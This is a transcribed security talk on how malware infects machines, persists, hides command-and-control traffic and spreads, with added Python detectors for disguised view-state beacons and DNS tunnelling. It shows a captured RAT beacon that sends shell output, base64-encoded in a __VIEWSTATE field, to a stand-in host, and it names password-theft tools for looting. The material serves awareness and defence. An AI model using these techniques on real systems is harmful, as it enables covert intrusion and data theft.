![Page 1: ECrime presentation - A few bits about malware](https://reader035.vdocuments.mx/reader035/viewer/2022070522/58eeb5ec1a28abaf628b45cb/html5/thumbnails/1.jpg)
A few bits about Malware
A story about trojan horses and rats.

$ whoami
• Michael Hendrickx
• Senior Security Analyst @ HelpAG
• Vulnerability Assessments
• Social Engineering
• Presentations
• Created new undetected* RAT for the company
• Belgian

* Until now

Malware attacks: a real threat
• Malware has caused a lot of damage
• Many names: RATs, virus, Trojan, rootkit, ransomware, …
• Examples: Cryptolocker, Zeus, BlackEnergy, …
• Targets different platforms:
  • Browsers
  • Smartphones
  • PCs

Malware attacks: stages
• Malware attacks come in 2 stages:
  • Infection: exploited bugs, phishing, waterhole attacks, USB, unattended terminal, …
  • Persistence: AV evasion, persistence, looting, CNC connectivity, lateral movement (“you’re in trouble”)

Malware attacks: infection
• Stage 1: modes of infection
  • Exploited software bugs
  • (Spear) phishing
  • Waterhole attack
  • Malicious USB

Malware attacks: infection
• Exploited software bugs
  • Attacker hacks into vulnerable service
  • Could be anything:
    • SQL injection on website leads to code execution
    • Poorly implemented upload functionality
    • Unpatched server software
    • Man in the Middle
    • Weak passwords
    • …

Malware attacks: infection
• Spear phishing
  • Very specific message to a single or very few victims
  • Holds malicious payload: macro, PDF, renamed files, trojaned archives, …
  • Or links to a malicious file: needs to be downloaded, won’t get caught by your AV.

Malware attacks: infection
• Waterhole attack
  • Indirect targeted attack
  • Attacker compromises sites that the victim probably visits
  • Exploits outdated browser or plugins
  • Forces install of malware (“your flash player is outdated”, “you should update Java”)

Malware attacks: infection
• Evil USB dongle
  • USB peripheral can be anything:
    • USB hard drive / dongle
    • Keyboard, WIFI / network adapter, microphone, …
    • Hub with any of the above
  • Example: USB Rubber Ducky
    • Looks like a dongle, is a keyboard
    • Types 1000 words per minute
    • Is only 30 USD

Malware attacks: stages
• On to stage 2:
  • Infection: exploited bugs, phishing, waterhole attacks, USB, unattended terminal, …
  • Persistence: AV evasion, persistence, looting, CNC connectivity, lateral movement

Malware attacks: persistence
• Stage 2: Persistence
  • Execution persistence: ensure that our malware keeps on running
  • CnC connectivity: listen for commands
  • AV evasion / hiding: to prevent malware from being detected, removed
  • Lateral movement: infect more machines

Malware attacks: Execution persistence
• Ensure malware keeps on running
  • Startup folder
  • Registry keys
  • Automatic services
  • Browser plugins / helper objects: you’re re-infected whenever the browser is opened
  • Infected document templates: every time a Word/PPT/Excel file is opened or created, you’re re-infected.
Use Microsoft’s Autoruns to see what processes start upon startup. (https://technet.microsoft.com/en-us/sysinternals/bb963902.aspx)

Malware attacks: CnC connectivity
• Direct traffic: probably (hopefully) detected and blocked
• HTTP tunnel: may get detected by L7 firewalls (“deep packet inspection”, pretty shallow)
• HTTPS: difficult to see what’s happening, unless MITM.
• DNS tunneling: usually gets “proxied” to the target DNS server. Do you monitor anomalies?
• Peer to peer WIFI network: “Hi, I’m an ad-hoc wifi network”, up to 10 – 20 meters

Malware attacks: hagrat CnC
• Encode / Encrypt / Obfuscate traffic

```http
POST /css/cc.aspx HTTP/1.1
Accept: text/html;q=0.8,application/xml,*/*
Accept-Language: en-gb;q=0.8,en
Content-Type: application/x-www-form-urlencoded
Cookie: ASPSESSION=laer8sp2miqisG0n2Ms1efjlj64; path=/
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Host: www.thisisafakedomain.com
Content-Length: 277
Connection: Keep-Alive

__VIEWSTATE=MTpNaWNyb3NvZnQgV2luZG93cyBbVmVyc2lvbiA2LjEuNzYwMV0NCkNvcHlyaWdodCAoYykgMjAwOSBNaWNyb3NvZnQgQ29ycG9yYXRpb24uICBBbGwgcmlnaHRzIHJlc2VydmVkLg0KDQpDOlxVc2Vyc1xoZW5kcmlja3hcb3duQ2xvdWQ+ZGlyIGM6Lw0KSW52YWxpZCBzd2l0Y2ggLSAiIi4NCg0KQzpcVXNlcnNcaGVuZHJpY2t4XG93bkNsb3VkPg;;.
```

Base64-decoded __VIEWSTATE value:

```text
1:Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\hendrickx\ownCloud>dir c:/
Invalid switch - "".

C:\Users\hendrickx\ownCloud>
```

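As an added defender-side example (not from the slides or from the hagrat tool), the following Python takes the POST body shown above, pulls out __VIEWSTATE, base64-decodes it and flags it when the decoded bytes read like cmd.exe output rather than the FF 01 header that real ASP.NET view state (ObjectStateFormatter) starts with. The shorter second body is a constructed, genuine-looking value; the marker patterns are assumptions.

```python
import base64
import re
from urllib.parse import unquote

# The POST body from the slide (a captured "hagrat" beacon); the trailing ";;." is part of the sample as shown.
SAMPLE_BODY = "__VIEWSTATE=MTpNaWNyb3NvZnQgV2luZG93cyBbVmVyc2lvbiA2LjEuNzYwMV0NCkNvcHlyaWdodCAoYykgMjAwOSBNaWNyb3NvZnQgQ29ycG9yYXRpb24uICBBbGwgcmlnaHRzIHJlc2VydmVkLg0KDQpDOlxVc2Vyc1xoZW5kcmlja3hcb3duQ2xvdWQ+ZGlyIGM6Lw0KSW52YWxpZCBzd2l0Y2ggLSAiIi4NCg0KQzpcVXNlcnNcaGVuZHJpY2t4XG93bkNsb3VkPg;;."

# Constructed body whose value starts with the FF 01 0F bytes ("/wEP...") a real view state begins with.
GENUINE_LIKE_BODY = "__VIEWSTATE=%2FwEPDwUJ"

# Text that never belongs in a genuine view state but does appear in relayed cmd.exe output (assumed markers).
SHELL_MARKERS = {
    "cmd-banner": re.compile(r"Microsoft Windows \[Version [\d.]+\]"),
    "cmd-prompt": re.compile(r"^[A-Za-z]:\\[^\r\n]*>", re.MULTILINE),
}


def extract_viewstate(body):
    """Return the raw (still URL-encoded) __VIEWSTATE value from a form body, or None."""
    m = re.search(r"(?:^|&)__VIEWSTATE=([A-Za-z0-9+/=%]*)", body)
    return m.group(1) if m else None


def b64decode_lenient(s):
    """Base64-decode, restoring the '=' padding that C2 clients often strip."""
    s = s.rstrip("=")
    return base64.b64decode(s + "=" * (-len(s) % 4))


def inspect_viewstate(body):
    """Classify a POST body: no view state, expected ASP.NET format, suspicious shell text, or unknown."""
    raw = extract_viewstate(body)
    if raw is None:
        return {"verdict": "no-viewstate"}
    try:
        blob = b64decode_lenient(unquote(raw))
    except ValueError:  # binascii.Error is a ValueError subclass
        return {"verdict": "not-base64"}
    # ObjectStateFormatter output starts with 0xFF (format marker) 0x01 (version).
    if blob[:2] == b"\xff\x01":
        return {"verdict": "expected-format"}
    text = blob.decode("ascii", errors="replace")
    hits = [name for name, pat in SHELL_MARKERS.items() if pat.search(text)]
    return {"verdict": "suspicious" if hits else "unknown-format", "hits": hits, "text": text}
```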
Malware attacks: hiding
• Hiding: download multiple stages
  Diagram: Dropper → Infect victim → “Can I reach the Internet?” → Malicious payload (real virus). Does the payload get detected?

Malware attacks: hiding
• Multi stage download ensures correct victim
  Diagram: Dropper → Infect victim → “Can I reach the Internet?” → the server handing out the payload decides:
    • “This is not the IP / Company / country I’m targeting” → Innocent payload (“Cool, I’ll install it”)
    • Otherwise → Malicious payload (real virus) (“Bingo!”)

Malware attacks: lateral movement
• Exfiltration of information
  • Documents (%userprofile%\documents)
  • Passwords (mimikatz, LaZagne)
  • Browser history
  • Emails, files, …
• Recon / infect the network
  • Ping other machines
  • File shares
  • (Sharepoint) portals

Remediation
• Human factor: don’t get infected
  • Social engineering exercises
  • Awareness
  • Alerting IT security (“Support, I think I did something wrong”)
• Technical factor: prevent, detect, destroy
  • Tight controls on end points
  • Monitor inbound programs (attachments, downloads, …)
  • Monitor network usage: DNS anomalies, unidentified protocols, …
  • Regular scanning with AV, IOC detectors, … such as Loki (https://github.com/Neo23x0/Loki)

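One way to act on the “DNS anomalies” bullet here and the earlier “Do you monitor anomalies?” question under DNS tunneling: an added Python example (not from the slides) that profiles a constructed DNS query log per parent domain and flags domains whose subdomains are numerous, mostly unique and high-entropy, which is what tunnelled data looks like. The thresholds and the two-label parent-domain heuristic are assumptions.

```python
import math
from collections import Counter, defaultdict

# Constructed sample DNS query log (not from the slides), one "<client> <qname> <qtype>" per line.
# The last six queries mimic a tunnel: ever-changing high-entropy labels under one parent domain.
SAMPLE_LOG = """\
10.0.0.5 www.example.com A
10.0.0.5 mail.example.com A
10.0.0.5 cdn.example.com A
10.0.0.7 4a9f31c08e2d7b65.t.thisisafakedomain.com TXT
10.0.0.7 d17e5b92f3a0c486.t.thisisafakedomain.com TXT
10.0.0.7 8c2b0f6e1d94a375.t.thisisafakedomain.com TXT
10.0.0.7 e6051a7c3f8d2b94.t.thisisafakedomain.com TXT
10.0.0.7 b3d8f2a1c7e05694.t.thisisafakedomain.com TXT
10.0.0.7 0f7c4e9a2d81b356.t.thisisafakedomain.com TXT
"""


def shannon_entropy(s):
    """Bits per character: 4.0 for a label of 16 distinct hex digits, far lower for ordinary hostnames."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def parent_domain(qname):
    # Crude heuristic: last two labels. Use a public-suffix list in production (co.uk etc.).
    return ".".join(qname.rstrip(".").split(".")[-2:])


def profile_domains(log_text):
    """Per parent domain: query count, distinct subdomains, entropy sum of the leftmost label, TXT/NULL count."""
    stats = defaultdict(lambda: {"queries": 0, "subdomains": set(), "entropy_sum": 0.0, "txt_or_null": 0})
    for line in log_text.splitlines():
        _client, qname, qtype = line.split()
        labels = qname.rstrip(".").split(".")
        s = stats[parent_domain(qname)]
        s["queries"] += 1
        s["subdomains"].add(".".join(labels[:-2]))
        s["entropy_sum"] += shannon_entropy(labels[0]) if len(labels) > 2 else 0.0
        s["txt_or_null"] += qtype in ("TXT", "NULL")
    return stats


def suspicious_domains(log_text, min_queries=5, min_unique_ratio=0.8, min_entropy=3.5):
    """Parent domains whose queries look like a tunnel: many, mostly unique, high-entropy subdomains."""
    flagged = []
    for parent, s in profile_domains(log_text).items():
        if s["queries"] < min_queries:
            continue
        unique_ratio = len(s["subdomains"]) / s["queries"]
        mean_entropy = s["entropy_sum"] / s["queries"]
        if unique_ratio >= min_unique_ratio and mean_entropy >= min_entropy:
            flagged.append(parent)
    return sorted(flagged)
```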
Thank you!
Questions?
Don’t accept any USB dongles from me!
CONTACT US | WWW.HELPAG.COM | [email protected]
DUBAI, UAE: ARJAAN OFFICE TOWER, OFFICE 1201 / 1208, PO BOX 500741, T +971 4 440 5666, F +971 4 363 6742
ABU DHABI, UAE: SALAM HQ BLDG, BLOCK 6, EAST 1-16, OFFICE 503, PO BOX 37195, T +971 2 644 3398, F +971 2 639 1155
DOHA, QATAR: AL DAFNA – PALM TOWER, OFFICE 4803, WEST BAY, P.O. BOX 31316, T +974 4432 8067, F +974 4432 8069